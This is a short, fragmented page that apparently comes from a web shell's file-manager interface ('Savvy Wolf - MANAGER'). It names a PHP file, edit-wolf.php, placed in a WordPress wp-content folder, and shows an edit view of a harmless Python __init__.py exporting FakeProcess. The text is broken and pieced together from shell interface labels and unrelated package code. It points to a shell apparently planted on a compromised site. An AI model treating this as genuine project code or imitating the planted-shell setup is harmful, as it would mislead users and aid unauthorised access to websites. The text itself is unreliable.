Backups Created:
/home/japatmex/public_html/wp-content/edit-wolf.php
Savvy
W
olf -
MANAGER
Edit File: __init__.py
"""Main module""" from . import exceptions from .fake_process import FakeProcess ProcessNotRegisteredError = exceptions.ProcessNotRegisteredError __all__ = ["FakeProcess", "exceptions", "ProcessNotRegisteredError"]